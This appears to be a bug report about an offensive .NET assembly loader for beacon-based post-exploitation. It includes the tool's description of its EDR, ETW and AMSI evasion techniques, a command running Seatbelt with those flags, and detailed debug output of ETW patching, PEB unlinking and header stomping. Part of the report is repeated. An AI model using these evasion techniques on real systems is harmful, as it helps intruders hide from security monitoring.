Load/Inject .NET assemblies by; reusing the host (spawnto) process loaded CLR AppDomainManager, Stomping Loader/.NET assembly PE DOS headers, Unlinking .NET related modules, bypassing ETW+AMSI, avoiding EDR hooks via NT static syscalls (x64) and hiding imports by dynamically resolving APIs (hash).
I'm seeing failures when using the "--stomp-headers" arguments. I'm using the following command line:
ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --unlink-modules --etw --asmi --stomp-headers
Which results in something like this:
* Tasked beacon to run: @args
* Tasked beacon to spawn x86 features to: %windir%\SysWOW64\ScriptRunner.exe
* Tasked beacon to spawn x64 features to: %windir%\sysnative\ScriptRunner.exe
* Tasked beacon to spawn .NET Assembly /tmp/Seatbelt.exe'
[+] host called home, sent: 85 bytes
[+] host called home, sent: 480116 bytes
[+] received output:
Hi,
I'm seeing failures when using the "--stomp-headers" arguments. I'm using the following command line:
ExecuteAssembly --dotnetassembly /tmp/Seatbelt.exe --unlink-modules --etw --asmi --stomp-headers
Which results in something like this: * Tasked beacon to run: @args * Tasked beacon to spawn x86 features to: %windir%\SysWOW64\ScriptRunner.exe * Tasked beacon to spawn x64 features to: %windir%\sysnative\ScriptRunner.exe * Tasked beacon to spawn .NET Assembly /tmp/Seatbelt.exe' [+] host called home, sent: 85 bytes [+] host called home, sent: 480116 bytes [+] received output:
[i]: .NET Assembly Length: 548352 bytes [+]: Parsing Arguments : [i]: Args count: 1 [+]: Base64 Decoding & Decompressing .NET Assembly... [+]: Base64 Decoding & Decompressing Done.
[+]: Patching ETW... [+]: Retrieving EtwEvenWrite Address from NTDLL... [+]: NTDLL.DLL Module Base Address: 0xfeea0000 [+]: EtwEvenWrite Export located at Address: 0xfeef2d50 [+]: Patching EtwEvenWrite 0xfeef2d50 [+]: ETW Patchine Done.
[+]: Enumerating Loaded CLR versions [+]: Scanning for any loaded modules with the name 'clr', 'mscoree'... [+] Unlinking CLR related modules from PEB [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll [i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll [i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll [i]: Module C:\WINDOWS\SYSTEM32\ucrtbase_clr0400.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\clr.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll [i]: Module C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscoreei.dll
[+]: Obtaining a handle of the current process: 820 [+]: Scanning for PE DOS Header 'MZ...' pattern... [i]: 9 PE DOS Headers found. [+]: Stomping 9 PE DOS headers: [i]: Stomping MZ Header: 0xbfefeb80 [-]: Not a valid PE DOS Header [i]: Stomping MZ Header: 0x10009ac0 [i]: Stomping MZ Header: 0x6a7a0009 [i]: Stomping MZ Header: 0x6a7c2ed9 [i]: Stomping MZ Header: 0x6a9e0000 [i]: Stomping MZ Header: 0x6aa03cd0 [i]: Stomping MZ Header: 0x6c50ccb0 [i]: Stomping MZ Header: 0x6c600000 [i]: Stomping MZ Header: 0x6cfd0080
[!] pMethodInfo->Invoke_3(...) failed, hr = 80131604 [!]: Something went wrong.
If I leave out the --stomp-headers it all works flawlessly. EDIT: If i switch to the PEB walking methods header stomping works fine